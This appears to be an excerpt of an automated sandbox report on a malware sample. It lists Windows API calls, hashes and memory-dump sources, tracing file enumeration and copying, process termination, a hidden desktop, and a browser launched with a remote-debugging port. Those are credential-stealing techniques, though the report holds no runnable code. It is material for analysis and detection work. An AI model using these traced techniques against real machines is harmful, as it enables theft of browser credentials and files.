                          • lstrcpy.KERNEL32(00000000,?), ref: 007E14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1535
                          • StrCmpCA.SHLWAPI(?,0125DCF0), ref: 007E1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E15E4
                          • StrCmpCA.SHLWAPI(?,0125D5C8), ref: 007E1602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1633
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1685
                          • StrCmpCA.SHLWAPI(?,0125D520), ref: 007E16B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E16F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1745
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007E181C
                          • FindClose.KERNEL32(00000000), ref: 007E182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 2d468764db3899dd4f5cfec87bc592567f880a0b64004fe1837e6a3fd3bb7234
                          • Instruction ID: bd535bab84b4b236a0069e775f19e4c09e01fd51e2dc556e8f27958aede5427e
                          • Opcode Fuzzy Hash: 2d468764db3899dd4f5cfec87bc592567f880a0b64004fe1837e6a3fd3bb7234
                          • Instruction Fuzzy Hash: 05129371A1124ADBDB21EFB5DC5AAAF77B8AF48300F444529F846E7251DB38DC438B90
                          APIs
                          • wsprintfA.USER32 ref: 007ECBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 007ECC13
                          • lstrcat.KERNEL32(?,?), ref: 007ECC5F
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007ECC71
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007ECC8B
                          • wsprintfA.USER32 ref: 007ECCB0
                          • PathMatchSpecA.SHLWAPI(?,01259178), ref: 007ECCE2
                          • CoInitialize.OLE32(00000000), ref: 007ECCEE
                            • Part of subcall function 007ECAE0: CoCreateInstance.COMBASE(007FB110,00000000,00000001,007FB100,?), ref: 007ECB06
                            • Part of subcall function 007ECAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007ECB46
                            • Part of subcall function 007ECAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 007ECBC9
                          • CoUninitialize.COMBASE ref: 007ECD09
                          • lstrcat.KERNEL32(?,?), ref: 007ECD2E
                          • lstrlen.KERNEL32(?), ref: 007ECD3B
                          • StrCmpCA.SHLWAPI(?,007FCFEC), ref: 007ECD55
                          • wsprintfA.USER32 ref: 007ECD7D
                          • wsprintfA.USER32 ref: 007ECD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 007ECDB0
                          • wsprintfA.USER32 ref: 007ECDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007ECDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 007ECE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 007ECE28
                          • CloseHandle.KERNEL32(00000000), ref: 007ECE33
                          • CloseHandle.KERNEL32(00000000), ref: 007ECE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007ECE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 007ECE94
                          • FindNextFileA.KERNEL32(?,?), ref: 007ECF8D
                          • FindClose.KERNEL32(?), ref: 007ECF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: d1ebc0b03bc1a70ed24d88d3639a10541b81b22f87524029f7d51338c4dfe8b4
                          • Instruction ID: 3879e7927f552356bdcbfc4e20a94de6433b32a7a5233e2dfab2ee42d0cba7c8
                          • Opcode Fuzzy Hash: d1ebc0b03bc1a70ed24d88d3639a10541b81b22f87524029f7d51338c4dfe8b4
                          • Instruction Fuzzy Hash: 45C18276A002599FDB61DFA4DC49AEE7779FF88300F004599F909A7281DE38AE46CF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E12BF
                          • lstrlen.KERNEL32(00804CA8), ref: 007E12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12E7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E133A
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E135C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E1376
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E13E2
                          • lstrlen.KERNEL32(00801794), ref: 007E13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E140A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1416
                          • lstrlen.KERNEL32(?), ref: 007E1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1443
                          • lstrcat.KERNEL32(00000000,?), ref: 007E1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E147A
                          • StrCmpCA.SHLWAPI(?,0125D598), ref: 007E14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1535
                          • StrCmpCA.SHLWAPI(?,0125DCF0), ref: 007E1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E15E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007E181C
                          • FindClose.KERNEL32(00000000), ref: 007E182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: d5fdb3458e184952cb72fa30d92ad9cb2d6a922bd95c3cda5ba735b44dea2fea
                          • Instruction ID: b4dfa409ee291a3957b5543036d174ab20035aa99f9ad20529207d2435fab13e
                          • Opcode Fuzzy Hash: d5fdb3458e184952cb72fa30d92ad9cb2d6a922bd95c3cda5ba735b44dea2fea
                          • Instruction Fuzzy Hash: F1C19471A1125A9BDB21EF75DC4AAAF77B8AF58300F444129F846E7352DB38DC038B90
                          APIs
                          • memset.MSVCRT ref: 007D9790
                          • lstrcat.KERNEL32(?,?), ref: 007D97A0
                          • lstrcat.KERNEL32(?,?), ref: 007D97B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 007D97C3
                          • memset.MSVCRT ref: 007D97D7
                            • Part of subcall function 007F3E70: lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F3EA5
                            • Part of subcall function 007F3E70: lstrcpy.KERNEL32(00000000,0125A4D0), ref: 007F3ECF
                            • Part of subcall function 007F3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,007D134E,?,0000001A), ref: 007F3ED9
                          • wsprintfA.USER32 ref: 007D9806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 007D9827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 007D9844
                            • Part of subcall function 007F46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F46B9
                            • Part of subcall function 007F46A0: Process32First.KERNEL32(00000000,00000128), ref: 007F46C9
                            • Part of subcall function 007F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007F46DB
                            • Part of subcall function 007F46A0: StrCmpCA.SHLWAPI(?,?), ref: 007F46ED
                            • Part of subcall function 007F46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F4702
                            • Part of subcall function 007F46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007F4711
                            • Part of subcall function 007F46A0: CloseHandle.KERNEL32(00000000), ref: 007F4718
                            • Part of subcall function 007F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007F4726
                            • Part of subcall function 007F46A0: CloseHandle.KERNEL32(00000000), ref: 007F4731
                          • lstrcat.KERNEL32(00000000,?), ref: 007D9878
                          • lstrcat.KERNEL32(00000000,?), ref: 007D9889
                          • lstrcat.KERNEL32(00000000,00804B60), ref: 007D989B
                          • memset.MSVCRT ref: 007D98AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007D98D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D9903
                          • StrStrA.SHLWAPI(00000000,0125E1D8), ref: 007D9919
                          • lstrcpyn.KERNEL32(00A093D0,00000000,00000000), ref: 007D9938
                          • lstrlen.KERNEL32(?), ref: 007D994B
                          • wsprintfA.USER32 ref: 007D995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 007D9971
                          • Sleep.KERNEL32(00001388), ref: 007D99E7
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D92E1
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D92FA
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D9399
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D93E6
                            • Part of subcall function 007F4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007F4759
                            • Part of subcall function 007F4740: Process32First.KERNEL32(00000000,00000128), ref: 007F4769
                            • Part of subcall function 007F4740: Process32Next.KERNEL32(00000000,00000128), ref: 007F477B
                            • Part of subcall function 007F4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F479C
                            • Part of subcall function 007F4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 007F47AB
                            • Part of subcall function 007F4740: CloseHandle.KERNEL32(00000000), ref: 007F47B2
                            • Part of subcall function 007F4740: Process32Next.KERNEL32(00000000,00000128), ref: 007F47C0
                            • Part of subcall function 007F4740: CloseHandle.KERNEL32(00000000), ref: 007F47CB
                          • CloseDesktop.USER32(?), ref: 007D9A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 496be3258a36c11d9f4c3fd480b4f9d9f99f0f31c4d831e67af45f79d6d08374
                          • Instruction ID: 49716f8d442e25fe1799cba633c07f77c19d4142a662ca290c16e6784314e9ee
                          • Opcode Fuzzy Hash: 496be3258a36c11d9f4c3fd480b4f9d9f99f0f31c4d831e67af45f79d6d08374
                          • Instruction Fuzzy Hash: D8917471A40218EBDB10DFB4DC49FEE77B8EF48700F108159F609A7291DE74AA46CBA4
                          APIs
                          • wsprintfA.USER32 ref: 007EE22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 007EE243
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007EE263
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007EE27D
                          • wsprintfA.USER32 ref: 007EE2A2
                          • StrCmpCA.SHLWAPI(?,007FCFEC), ref: 007EE2B4
                          • wsprintfA.USER32 ref: 007EE2D1
                            • Part of subcall function 007EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007EEE12
                          • wsprintfA.USER32 ref: 007EE2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 007EE304
                          • lstrcat.KERNEL32(?,0125E998), ref: 007EE335
                          • lstrcat.KERNEL32(?,00801794), ref: 007EE347
                          • lstrcat.KERNEL32(?,?), ref: 007EE358
                          • lstrcat.KERNEL32(?,00801794), ref: 007EE36A
                          • lstrcat.KERNEL32(?,?), ref: 007EE37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007EE394
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE422
                          • DeleteFileA.KERNEL32(?), ref: 007EE45C
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007EE49B
                          • FindClose.KERNEL32(00000000), ref: 007EE4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: ebe313a9ad436a3dbd4e14d909e3449223731e91cdc80d9fd8485b3c321a51f1
                          • Instruction ID: 2a57ba1bac116e4dbf80273450205d83eb00aadeae3d07c214f07e7eec5108ae
                          • Opcode Fuzzy Hash: ebe313a9ad436a3dbd4e14d909e3449223731e91cdc80d9fd8485b3c321a51f1
                          • Instruction Fuzzy Hash: FA81717190025D9BCB20EFB5DC49AEF7779FF48300F008999B55A93291DB39AA46CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D16E2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D176C
                          • lstrcat.KERNEL32(00000000), ref: 007D1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D17A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D18FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: e469c42eb758dcb635e4a730e04b9f841d730c0604d7c789aac9e6c925bebfb9
                          • Instruction ID: 5a86a79e56a9559f55f47056957403b57abdda9009286b8d98a67e30c2b49d9e
                          • Opcode Fuzzy Hash: e469c42eb758dcb635e4a730e04b9f841d730c0604d7c789aac9e6c925bebfb9
                          • Instruction Fuzzy Hash: A881633191121AEBCB21EFA4DD99AAF77B9EF54300F445126F805A7352DB38AD03CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007EDD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007EDD4C
                          • wsprintfA.USER32 ref: 007EDD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 007EDD79
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007EDD9C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007EDDB6
                          • wsprintfA.USER32 ref: 007EDDD4
                          • DeleteFileA.KERNEL32(?), ref: 007EDE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007EDDED
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                            • Part of subcall function 007ED980: memset.MSVCRT ref: 007ED9A1
                            • Part of subcall function 007ED980: memset.MSVCRT ref: 007ED9B3
                            • Part of subcall function 007ED980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007ED9DB
                            • Part of subcall function 007ED980: lstrcpy.KERNEL32(00000000,?), ref: 007EDA0E
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,00000000), ref: 007EDA1C
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,0125E2B0), ref: 007EDA36
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,?), ref: 007EDA4A
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,0125D6A0), ref: 007EDA5E
                            • Part of subcall function 007ED980: lstrcpy.KERNEL32(00000000,?), ref: 007EDA8E
                            • Part of subcall function 007ED980: GetFileAttributesA.KERNEL32(00000000), ref: 007EDA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007EDE2E
                          • FindClose.KERNEL32(00000000), ref: 007EDE3D
                          • lstrcat.KERNEL32(?,0125E998), ref: 007EDE66
                          • lstrcat.KERNEL32(?,0125DDD0), ref: 007EDE7A
                          • lstrlen.KERNEL32(?), ref: 007EDE84
                          • lstrlen.KERNEL32(?), ref: 007EDE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EDED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 8a78d9b1d4f3db1d0e402138640e6fc17b5dad52d178e5d0154b3010da7f3a00
                          • Instruction ID: 2f608779bc544fa7d5621b4e437fec0855124b71e4843989b060c7ffa487e505
                          • Opcode Fuzzy Hash: 8a78d9b1d4f3db1d0e402138640e6fc17b5dad52d178e5d0154b3010da7f3a00
                          • Instruction Fuzzy Hash: 12612171910219ABCB20EFB4DC49AEE77B9FF98300F0045A9B945E7251DB38AE56CB50
                          APIs
                          • wsprintfA.USER32 ref: 007ED54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 007ED564
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007ED584
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007ED59E
                          • lstrcat.KERNEL32(?,0125E998), ref: 007ED5E3
                          • lstrcat.KERNEL32(?,0125EA68), ref: 007ED5F7
                          • lstrcat.KERNEL32(?,?), ref: 007ED60B
                          • lstrcat.KERNEL32(?,?), ref: 007ED61C
                          • lstrcat.KERNEL32(?,00801794), ref: 007ED62E
                          • lstrcat.KERNEL32(?,?), ref: 007ED642
                          • lstrcpy.KERNEL32(00000000,?), ref: 007ED682
                          • lstrcpy.KERNEL32(00000000,?), ref: 007ED6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007ED737
                          • FindClose.KERNEL32(00000000), ref: 007ED746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: ec2c030f565145f2eeab2f862ada0f98c427ab6ff7f352f2bfb9bc4d50905088
                          • Instruction ID: cc86a69aec5f95d0ed05717a960c1565e2de962e62272bab3a022acd33e711d6
                          • Opcode Fuzzy Hash: ec2c030f565145f2eeab2f862ada0f98c427ab6ff7f352f2bfb9bc4d50905088
                          • Instruction Fuzzy Hash: 916154719101199BDF20EFB4DC88ADE77B8EF58300F0085A5EA59A7351DB38AE46CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
